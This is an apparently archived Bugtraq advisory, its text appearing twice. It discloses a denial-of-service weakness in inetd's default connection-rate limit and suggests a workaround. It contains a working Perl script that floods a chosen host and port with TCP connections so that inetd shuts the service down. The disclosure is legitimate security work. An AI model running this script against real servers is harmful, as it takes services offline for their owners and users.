Dear bugtraq (at) securityfocus (dot) com [email concealed],
Well, we all blame Microsoft in insecure default configuration... Isn't
it time to clean outdated code in Unix?
I. Intro
Saint_Byte reported DoS vulnerability in wu-ftp. Small perl script (like
one below) kills ftp service... With closer look we have good old inetd
feature a lot of existing FreeBSD/linux installations are still
vulnerable. This problem is known since ancient time [1] and was
discussed again and again, but still present. In fact, problem is well
known. It's just another rake everyone steps to. It's on any man and
FAQ, but may be it's time to resolve it? Because it's definitely a BUG.
II. Who is vulnerable
Any system shipped with network daemons launched through inetd (FreeBSD,
SuSE, Red Hat, etc.).
III. Details
Inetd has an option
-R rate
Specify the maximum number of times a service can be invoked in
one minute; the default is 256. A rate of 0 allows an unlimited
number of invocations.
The problem is, remote attacker can establish as much connections per
minute as bandwidth allows... Now, guess how inetd reacts if more than
256 connections received in one minute? It will disable service for next
10 minutes to help attack to succeed. Of cause, this is documented.
Interval is not configurable.
something like
Jul 23 15:27:10 host inetd[86]: ftp/tcp server failing (looping), service terminated
will appear in logs... If connection is closed by attacker before
service actually starts, IP address of attacker will never be logged.
IV. Workaround
-R 0 -s your_ad_can_be_here
or ask everyone to do not bother your server.
V. inetd-DoS-by-default-11-years-anniversary-super-exploit.pl
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
#!/usr/bin/perl
use Socket;
$host=@ARGV[0];
$port=@ARGV[1];
if ($host eq "" || $port eq "") {print "\n Usage progname HOST PORT \n";}
$iadr=inet_aton($host);
$padr=sockaddr_in($port,$iadr);
for($i=0; $i < 300; $i++)
{
socket(SOCK,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
connect(SOCK,$padr) or next;
close(SOCK);
}
print "\nDone\n";
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
VI. References:
[1]Ari Luotonen, "www/tcp server failing (looping), service terminated"
http://www.webhistory.org/www.lists/www-talk.1993q4/0312.html
--
http://www.security.nnov.ru
/\_/ { , . } |+--oQQo->{ ^ }<-----+ | ZARAZA U 3APA3A }
+-------------o66o--+ /
|/
You know my name - look up my number (The Beatles)
Well, we all blame Microsoft in insecure default configuration... Isn't
it time to clean outdated code in Unix?
I. Intro
Saint_Byte reported DoS vulnerability in wu-ftp. Small perl script (like
one below) kills ftp service... With closer look we have good old inetd
feature a lot of existing FreeBSD/linux installations are still
vulnerable. This problem is known since ancient time [1] and was
discussed again and again, but still present. In fact, problem is well
known. It's just another rake everyone steps to. It's on any man and
FAQ, but may be it's time to resolve it? Because it's definitely a BUG.
II. Who is vulnerable
Any system shipped with network daemons launched through inetd (FreeBSD,
SuSE, Red Hat, etc.).
III. Details
Inetd has an option
-R rate
Specify the maximum number of times a service can be invoked in
one minute; the default is 256. A rate of 0 allows an unlimited
number of invocations.
The problem is, remote attacker can establish as much connections per
minute as bandwidth allows... Now, guess how inetd reacts if more than
256 connections received in one minute? It will disable service for next
10 minutes to help attack to succeed. Of cause, this is documented.
Interval is not configurable.
something like
Jul 23 15:27:10 host inetd[86]: ftp/tcp server failing (looping), service terminated
will appear in logs... If connection is closed by attacker before
service actually starts, IP address of attacker will never be logged.
IV. Workaround
-R 0 -s your_ad_can_be_here
or ask everyone to do not bother your server.
V. inetd-DoS-by-default-11-years-anniversary-super-exploit.pl
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
#!/usr/bin/perl
use Socket;
$host=@ARGV[0];
$port=@ARGV[1];
if ($host eq "" || $port eq "") {print "\n Usage progname HOST PORT \n";}
$iadr=inet_aton($host);
$padr=sockaddr_in($port,$iadr);
for($i=0; $i < 300; $i++)
{
socket(SOCK,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
connect(SOCK,$padr) or next;
close(SOCK);
}
print "\nDone\n";
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
VI. References:
[1]Ari Luotonen, "www/tcp server failing (looping), service terminated"
http://www.webhistory.org/www.lists/www-talk.1993q4/0312.html
--
http://www.security.nnov.ru
/\_/ { , . } |+--oQQo->{ ^ }<-----+ | ZARAZA U 3APA3A }
+-------------o66o--+ /
|/
You know my name - look up my number (The Beatles)
[ reply ]